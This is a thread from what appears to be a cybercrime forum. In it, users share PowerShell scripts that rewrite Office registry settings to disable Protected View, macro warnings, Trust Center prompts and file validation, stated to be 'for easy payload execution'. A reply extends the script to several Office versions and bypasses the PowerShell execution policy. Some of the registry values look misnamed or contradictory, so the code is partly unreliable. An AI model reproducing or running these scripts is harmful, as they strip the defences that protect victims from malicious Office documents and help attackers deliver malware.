• XSS.stack #1 – первый литературный журнал от юзеров форума

прочее Disable MS-Office Protected-View and other securities

Отслеживать
miamoder

miamoder

ripper
КИДАЛА
Регистрация
11.06.2023
Сообщения
14
Реакции
10
Пожалуйста, обратите внимание, что пользователь заблокирован
Powershell script to disable ms-office securities; enable macros etc for easy payload execution


Код: 
$regPath = "HKCU:\Software\Microsoft\Office\*\Common\Security"
Set-ItemProperty -Path $regPath -Name "DisableHardwareAcceleration" -Value 1
Set-ItemProperty -Path $regPath -Name "DisableBootLoad" -Value 1
Set-ItemProperty -Path $regPath -Name "DisableSafeMode" -Value 1
Set-ItemProperty -Path $regPath -Name "ProtectedView" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Common\Security"
Set-ItemProperty -Path $regPath -Name "VBAWarnings" -Value 1
Set-ItemProperty -Path $regPath -Name "EnableVBAWarnings" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security"
Set-ItemProperty -Path $regPath -Name "EnableDynamicDataExchange" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Excel\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\PowerPoint\Security"
Set-ItemProperty -Path $regPath -Name "ExtensionHardening" -Value 0
$regPath = "HKCU:\Software\Microsoft\Office\*\Word\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\Excel\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
$regPath = "HKCU:\Software\Microsoft\Office\*\PowerPoint\Security\Trusted Documents"
Set-ItemProperty -Path $regPath -Name "EnableUnsafeLocationsInTrustedDocuments" -Value 1
 
Пожалуйста, обратите внимание, что пользователь заблокирован
all office versions
 
Пожалуйста, обратите внимание, что пользователь заблокирован
crypt0 сказал(а):
all office versions
Below is an improved and extended version that supports all office versions. Enjoy!!

Код: 
Set-ExecutionPolicy Bypass -Scope Process -Force
$officeVersions = @("12.0", "14.0", "15.0", "16.0")
ForEach ($officeVersion in $officeVersions) {
    $regPath = "HKCU:\Software\Microsoft\Office\$officeVersion"
    $wordRegPath = "$regPath\Word\Security"
    $excelRegPath = "$regPath\Excel\Security"
    $powerPointRegPath = "$regPath\PowerPoint\Security"
    $outlookRegPath = "$regPath\Outlook\Security"
    $publisherRegPath = "$regPath\Publisher\Security"
    $onenoteRegPath = "$regPath\OneNote\Security" 
    $appsRegPaths = @($wordRegPath, $excelRegPath, $powerPointRegPath, $outlookRegPath, $publisherRegPath, $onenoteRegPath)

    ForEach ($appRegPath in $appsRegPaths) {
        if (Test-Path $appRegPath) {
            New-ItemProperty -Path $appRegPath -Name "VBAWarnings" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "AccessVBOM" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "DisableAttachementsInPV" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "DisableInternetFilesInPV" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "DisableUnsafeLocationsInPV" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "BlockContentExecutionFromInternet" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "DisableSafeMode" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "LowRiskFileTypes" -Value ".*" -PropertyType String -Force
            New-ItemProperty -Path $appRegPath -Name "DisableTrustCenterUI" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "TrustBarNotificationOnLoad" -Value 0 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "TrustBarNotificationOnMacro" -Value 0 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "TrustAccessVBOM" -Value 0 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "EnableUnsafeFilesInPV" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "Disable<mark>Office</mark>FileValidation" -Value 1 -PropertyType DWORD -Force
            New-ItemProperty -Path $appRegPath -Name "DisableDocInspector" -Value 1 -PropertyType DWORD -Force
        }
    }
}
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
thanks ill give it a go
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх